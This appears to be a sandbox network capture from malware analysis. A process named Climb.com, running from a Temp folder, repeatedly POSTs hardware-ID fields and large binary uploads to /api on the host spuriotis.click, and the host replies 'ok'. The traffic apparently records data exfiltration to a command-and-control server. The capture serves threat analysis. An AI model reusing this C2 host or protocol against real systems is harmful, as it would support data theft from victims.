gjOVzAdAIyVgRLk3EjW4mkFnuK/uf554hoMuYImAJiNjVzQodgTjhdQxzWMmoYj7ZfL8XY7uDh1CBz+E2MTmU3eCEDjmdHP1dHHNBgJV6arhJ9l/Po7uCCdzDhBZ4CcDI4ekjOIwIyQgRLk1EzToKpE2GO+OD94J86facSkh8iYy5pVIlyDCwaQx+TKmRegagYcYvr5u3igHM64wuWDmY/P3xAgmZFNlVAGt17KxjG7hhvxaGjyvaMdj6nHNsXI
2024-12-28 08:33:58 UTC	1369	IN	Data Raw: 45 6c 69 30 61 64 58 70 50 42 64 5a 31 4d 68 71 39 72 52 46 35 67 75 2b 6a 39 4e 4c 42 4f 6a 7a 39 51 38 30 33 65 33 73 2f 64 51 50 57 4c 56 63 79 57 6b 4d 4a 78 58 55 6f 53 59 4f 6a 45 31 57 4b 2f 76 58 6f 34 6f 78 72 4f 71 73 49 6d 45 34 73 65 7a 39 68 41 39 59 74 62 54 4a 4d 52 7a 7a 51 59 79 30 59 78 75 34 59 59 63 57 68 6f 39 57 74 6e 58 6b 6a 35 41 79 45 4d 43 4a 6a 49 55 63 44 68 58 74 46 4a 56 6c 53 47 4e 35 2b 4e 57 62 49 39 6b 73 6c 31 36 75 78 75 66 4c 50 5a 51 79 70 51 35 52 4f 4f 67 49 68 4f 56 58 4f 4e 52 42 37 47 6c 5a 54 69 7a 4a 6a 57 35 71 38 47 58 53 54 2b 71 54 56 30 36 68 73 4f 65 41 54 6b 68 6c 74 65 33 59 35 54 4d 34 31 65 33 56 54 51 77 6a 43 5a 43 6c 49 6a 2b 34 67 4f 63 58 68 6f 37 4f 74 75 6e 6b 39 36 51 53 44 48 79 38 63 4c 6e Data Ascii: Eli0adXpPBdZ1Mhq9rRF5gu+j9NLBOjz9Q803e3s/dQPWLVcyWkMJxXUoSYOjE1WK/vXo4oxrOqsImE4sez9hA9YtbTJMRzzQYy0Yxu4YYcWho9WtnXkj5AyEMCJjIUcDhXtFJVlSGN5+NWbI9ksl16uxufLPZQypQ5ROOgIhOVXONRB7GlZTizJjW5q8GXST+qTV06hsOeATkhlte3Y5TM41e3VTQwjCZClIj+4gOcXho7Otunk96QSDHy8cLn
2024-12-28 08:33:58 UTC	1369	IN	Data Raw: 66 44 52 58 53 31 2f 64 65 53 52 66 6d 4c 67 45 4f 34 33 36 2b 66 48 54 73 56 45 2f 34 51 53 50 43 57 51 64 47 44 6b 4e 7a 6d 49 43 62 57 4d 45 57 35 4e 4e 61 68 69 51 37 6b 63 33 73 50 72 74 35 65 71 5a 61 33 37 50 49 4b 38 30 49 42 63 2f 62 41 47 36 61 6c 49 6b 55 55 6b 66 6b 7a 78 6b 58 73 6a 32 54 7a 6e 46 2f 66 4b 72 74 64 38 6f 61 4c 4a 51 77 6c 34 77 4a 48 5a 67 41 35 67 74 47 6d 63 55 42 41 47 54 4b 6d 51 66 69 37 77 4e 63 59 62 76 34 4b 7a 54 73 56 30 39 34 41 4b 44 48 6e 55 30 42 6b 64 57 6a 57 4e 4d 4d 6b 78 56 55 35 30 79 4b 78 6a 51 6c 31 38 2f 78 63 61 74 71 2f 58 50 49 6e 50 53 41 4a 73 41 5a 53 30 70 4e 47 53 41 61 6b 4d 6a 53 6c 4d 63 6b 7a 78 6b 58 73 6a 32 54 54 6e 46 2f 66 4b 72 74 64 38 6f 61 4c 4a 51 77 6c 34 77 4a 48 5a 67 41 35 67 Data Ascii: fDRXS1/deSRfmLgEO436+fHTsVE/4QSPCWQdGDkNzmICbWMEW5NNahiQ7kc3sPrt5eqZa37PIK80IBc/bAG6alIkUUkfkzxkXsj2TznF/fKrtd8oaLJQwl4wJHZgA5gtGmcUBAGTKmQfi7wNcYbv4KzTsV094AKDHnU0BkdWjWNMMkxVU50yKxjQl18/xcatq/XPInPSAJsAZS0pNGSAakMjSlMckzxkXsj2TTnF/fKrtd8oaLJQwl4wJHZgA5g
2024-12-28 08:33:58 UTC	1369	IN	Data Raw: 6b 6b 63 31 44 41 45 58 35 36 74 58 7a 6e 46 39 61 4f 7a 72 59 35 77 49 2b 6f 4d 6b 6b 4a 6c 49 54 38 35 44 63 35 6a 41 6d 30 61 52 52 6e 44 66 79 74 66 78 4b 67 52 65 63 58 6d 72 66 4b 74 6d 54 70 72 74 45 33 56 48 43 4a 6a 65 44 35 41 6e 48 39 45 4e 6b 78 48 56 4f 31 4d 43 55 71 50 76 68 77 31 74 50 54 6e 2f 66 69 4d 61 6a 54 5a 50 62 67 63 5a 53 73 37 4f 33 4b 59 62 6b 49 37 58 51 52 64 6b 32 70 6b 41 4d 69 44 44 58 43 56 2b 71 4f 6c 72 59 4d 36 61 36 63 4f 68 77 6c 79 4f 48 52 2b 57 59 6b 74 58 58 74 44 42 41 57 54 4b 6e 63 57 79 4c 78 66 4c 38 57 2b 37 65 62 73 6a 48 51 77 39 52 47 54 44 58 51 34 66 30 64 39 6f 33 39 46 4a 56 6b 47 49 74 35 32 4d 6b 32 4c 76 68 68 4a 75 39 54 78 37 50 32 4d 4f 42 2f 67 44 70 6b 77 58 41 77 70 66 6c 50 4d 53 30 45 6a Data Ascii: kkc1DAEX56tXznF9aOzrY5wI+oMkkJlIT85Dc5jAm0aRRnDfytfxKgRecXmrfKtmTprtE3VHCJjeD5AnH9ENkxHVO1MCUqPvhw1tPTn/fiMajTZPbgcZSs7O3KYbkI7XQRdk2pkAMiDDXCV+qOlrYM6a6cOhwlyOHR+WYktXXtDBAWTKncWyLxfL8W+7ebsjHQw9RGTDXQ4f0d9o39FJVkGIt52Mk2LvhhJu9Tx7P2MOB/gDpkwXAwpflPMS0Ej

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	172.67.128.184	443	8000	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:34:00 UTC	271	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SZB9DPFP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18101 Host: spuriotis.click
2024-12-28 08:34:00 UTC	15331	OUT	Data Raw: 2d 2d 53 5a 42 39 44 50 46 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 32 43 44 30 32 34 44 39 32 36 30 39 38 44 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 53 5a 42 39 44 50 46 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 53 5a 42 39 44 50 46 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 53 5a 42 39 44 50 46 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f Data Ascii: --SZB9DPFPContent-Disposition: form-data; name="hwid"8D2CD024D926098DD9AC212D15D33917--SZB9DPFPContent-Disposition: form-data; name="pid"2--SZB9DPFPContent-Disposition: form-data; name="lid"5FwhVM--lll--SZB9DPFPContent-Dispositio
2024-12-28 08:34:00 UTC	2770	OUT	Data Raw: 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b 56 2d 7b 91 d7 e9 19 4d f6 Data Ascii: 3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5V-{M
2024-12-28 08:34:01 UTC	1131	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:34:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=o9g9qjnhfpvebnggaugkv7cdnc; expires=Wed, 23 Apr 2025 02:20:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CTkaqZ2%2BOYMhsqHkcTtshH02akTKLMNBWrYS6NiQde%2B%2FeRf01hXwH7speQn8kfrwjo51TqJaoVWZZ8sIrX6OnwAp3RbGWCHoxDMHjw%2F1OO2DthKzBDeVi%2BkxypaOtScZftw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f903571e8686a5e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2091&min_rtt=2075&rtt_var=811&sent=13&recv=22&lost=0&retrans=0&sent_bytes=2833&recv_bytes=19052&delivery_rate=1322463&cwnd=186&unsent_bytes=0&cid=6c75fb1b8bd5b256&ts=999&x=0"
2024-12-28 08:34:01 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 08:34:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49743	172.67.128.184	443	8000	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:34:02 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=BJ3R6HHLJRG3T2M User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8764 Host: spuriotis.click
2024-12-28 08:34:02 UTC	8764	OUT	Data Raw: 2d 2d 42 4a 33 52 36 48 48 4c 4a 52 47 33 54 32 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 32 43 44 30 32 34 44 39 32 36 30 39 38 44 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 42 4a 33 52 36 48 48 4c 4a 52 47 33 54 32 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 42 4a 33 52 36 48 48 4c 4a 52 47 33 54 32 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 42 4a 33 52 36 48 48 Data Ascii: --BJ3R6HHLJRG3T2MContent-Disposition: form-data; name="hwid"8D2CD024D926098DD9AC212D15D33917--BJ3R6HHLJRG3T2MContent-Disposition: form-data; name="pid"2--BJ3R6HHLJRG3T2MContent-Disposition: form-data; name="lid"5FwhVM--lll--BJ3R6HH
2024-12-28 08:34:03 UTC	1125	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:34:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mvg0hehu8hi9dp1csf3e3ottgo; expires=Wed, 23 Apr 2025 02:20:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=85W3k1WzOUgjjdYb2m9dozxdCEH6IOa2Eygi%2F41M4j7q6N5mAW8%2BmfeBipCyhqqwiF3Enq1KzvfbUTu2CURFsZUTMVkO3ssEqdefwu%2FHmEDoZU2SMMxINXFb3vtMVj2MP48%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90358099a97ce8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1806&rtt_var=685&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2833&recv_bytes=9699&delivery_rate=1587819&cwnd=200&unsent_bytes=0&cid=1ab3091519753ded&ts=925&x=0"
2024-12-28 08:34:03 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 08:34:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49744	172.67.128.184	443	8000	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:34:05 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=CFC8QXO2IQ469U639D6 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20441 Host: spuriotis.click
2024-12-28 08:34:05 UTC	15331	OUT	Data Raw: 2d 2d 43 46 43 38 51 58 4f 32 49 51 34 36 39 55 36 33 39 44 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 32 43 44 30 32 34 44 39 32 36 30 39 38 44 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 43 46 43 38 51 58 4f 32 49 51 34 36 39 55 36 33 39 44 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 43 46 43 38 51 58 4f 32 49 51 34 36 39 55 36 33 39 44 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c Data Ascii: --CFC8QXO2IQ469U639D6Content-Disposition: form-data; name="hwid"8D2CD024D926098DD9AC212D15D33917--CFC8QXO2IQ469U639D6Content-Disposition: form-data; name="pid"3--CFC8QXO2IQ469U639D6Content-Disposition: form-data; name="lid"5FwhVM--ll
2024-12-28 08:34:05 UTC	5110	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 Data Ascii: `M?lrQMn 64F6(X&7~`a
2024-12-28 08:34:06 UTC	1125	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:34:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5t2ju389c5t4ud36q7sovtchaj; expires=Wed, 23 Apr 2025 02:20:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FzxsVfq4hMlnPFvI0Sm7a0fvWuLTv1UyvuWoL%2FpWYrMpz4ncbWSw8ALsCKVhYFQWnzQYVM2sfBgoDXz6PPKxSNmNgboZlFFFwg51TPT%2BjM4BSSx8IybPTzBXBprGskqi6rs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90358fe84e4381-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1691&min_rtt=1684&rtt_var=645&sent=15&recv=26&lost=0&retrans=0&sent_bytes=2833&recv_bytes=21403&delivery_rate=1677197&cwnd=211&unsent_bytes=0&cid=300de297a0f9126b&ts=944&x=0"
2024-12-28 08:34:06 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 08:34:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49745	172.67.128.184	443	8000	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:34:07 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=9HK79OX2B6X1K0XFSJN User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1261 Host: spuriotis.click
2024-12-28 08:34:07 UTC	1261	OUT	Data Raw: 2d 2d 39 48 4b 37 39 4f 58 32 42 36 58 31 4b 30 58 46 53 4a 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 32 43 44 30 32 34 44 39 32 36 30 39 38 44 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 39 48 4b 37 39 4f 58 32 42 36 58 31 4b 30 58 46 53 4a 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 48 4b 37 39 4f 58 32 42 36 58 31 4b 30 58 46 53 4a 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c Data Ascii: --9HK79OX2B6X1K0XFSJNContent-Disposition: form-data; name="hwid"8D2CD024D926098DD9AC212D15D33917--9HK79OX2B6X1K0XFSJNContent-Disposition: form-data; name="pid"1--9HK79OX2B6X1K0XFSJNContent-Disposition: form-data; name="lid"5FwhVM--ll
2024-12-28 08:34:08 UTC	1128	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:34:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=e24r3hd2vidcpd3do3r19r4rg3; expires=Wed, 23 Apr 2025 02:20:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IZEUa2ctyIBaTrCwrkhw0W%2B47NkxIV%2BeF2eLqVMxyZzQoz6P24uyzdBM%2BoF%2Bl30hDNqsJ7QmQp4qTrEWaSqri9xn4ts8bm%2BxD0tc1G48OI2TGkra0ia4cqsJ9r8mu8Sxwyc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90359eddc08c24-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2019&min_rtt=2017&rtt_var=758&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2178&delivery_rate=1447694&cwnd=141&unsent_bytes=0&cid=ea974e182bbcc378&ts=851&x=0"
2024-12-28 08:34:08 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 08:34:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49747	172.67.128.184	443	8000	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:34:09 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=5M3LFGFBW5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 550233 Host: spuriotis.click
2024-12-28 08:34:09 UTC	15331	OUT	Data Raw: 2d 2d 35 4d 33 4c 46 47 46 42 57 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 32 43 44 30 32 34 44 39 32 36 30 39 38 44 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 35 4d 33 4c 46 47 46 42 57 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 4d 33 4c 46 47 46 42 57 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 35 4d 33 4c 46 47 46 42 57 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 Data Ascii: --5M3LFGFBW5Content-Disposition: form-data; name="hwid"8D2CD024D926098DD9AC212D15D33917--5M3LFGFBW5Content-Disposition: form-data; name="pid"1--5M3LFGFBW5Content-Disposition: form-data; name="lid"5FwhVM--lll--5M3LFGFBW5Content-Di
2024-12-28 08:34:09 UTC	15331	OUT	Data Raw: 0c 78 92 63 62 fd 7f 2e 23 ec ab 00 9a b8 9c 9b 6d f1 97 01 db 27 f9 e8 34 b6 82 98 e9 02 dd d3 58 20 76 45 1d 56 ca 27 24 87 f8 16 9c 75 16 14 08 90 26 ae df 18 3f 11 27 40 9b 2f 56 9f 8a bf 13 6e b7 11 11 70 2c 6c 2f c3 e8 0f 21 5b 67 e7 83 28 e3 20 bc 3e 28 e9 08 f2 9f cc 83 e0 6c a8 52 0a 7f a4 19 2e dc 0f 1c b4 3a 01 b9 9a e7 2d 88 54 df b8 b4 28 70 e3 df 96 8f 03 2e 7d 63 7d ef d2 46 ec 87 9c de a1 43 35 eb 37 ae 52 a1 02 fb 8a 0e 93 92 ab 89 21 ae 93 69 51 28 b8 77 bf 8f 88 11 26 14 99 76 62 68 5a 0e 06 24 f9 c7 53 73 41 71 b0 a3 cb 9a 43 83 06 7e 3a 60 e9 e0 fb 3e 3d b0 dd 58 7e f7 cd a9 d1 c1 8b bb fb bd 6f 9c ec 95 ee 9d 1c 53 b4 7f eb 50 52 95 fd c6 a6 a2 e0 bf 8b 69 b3 87 ff 01 5a 55 a1 1f bc 05 81 91 86 e8 f8 36 7d fc 16 90 36 ab bf c4 ba bd Data Ascii: xcb.#m'4X vEV'$u&?'@/Vnp,l/![g( >(lR.:-T(p.}c}FC57R!iQ(w&vbhZ$SsAqC~:`>=X~oSPRiZU6}6
2024-12-28 08:34:09 UTC	15331	OUT	Data Raw: df 3f 8e c7 95 8d 4e 4e 4f 47 d7 e9 4f 28 39 ab 80 9d 8e 11 10 41 6e 1f 9e 6a 19 48 54 51 52 8c 88 fb f5 fe c4 31 f9 48 03 a7 2e 43 9c df 71 15 3e 3f 5e be 5a 57 07 f7 a8 b1 ec d7 bb 0c 02 ff 5d 35 eb 69 81 57 25 3c 3c 9a 9f 47 3c 16 cd 2f b4 a6 d4 b7 24 b4 b3 49 4e fb d5 46 ed a3 38 82 1c 4a 68 0f ce e4 a1 ee 92 78 a5 ca 2b c1 d4 96 3b a1 b5 7b f2 27 e5 fa f9 bf ab 67 4d 5e 19 fd 7d 36 fa 6a 7a c8 3e be bb 41 a2 7d d4 66 c3 e7 8d d1 b0 bf f8 2f c5 da a9 10 7e f4 4f 66 f7 ba d3 15 bf 47 99 86 88 ce 2c d1 ac dc 16 59 a1 f5 e1 d8 63 43 50 77 d4 96 c8 d3 1d 05 2a e9 2c e5 09 5e ba 48 86 c4 0b 76 b0 68 ba 18 73 7c 73 96 db fd 9e a3 df 6a 82 f7 d0 ff b5 c3 b4 b5 93 fe a0 04 e2 5f 94 5d bc 3e 6f 33 12 29 40 38 1a 6a 43 b9 92 af 31 a0 c7 ef 27 4d 1c 93 7a 66 05 Data Ascii: ?NNOGO(9AnjHTQR1H.Cq>?^ZW]5iW%<<G</$INF8Jhx+;{'gM^}6jz>A}f/~OfG,YcCPw*,^Hvhs\|sj_]>o3)@8jC1'Mzf
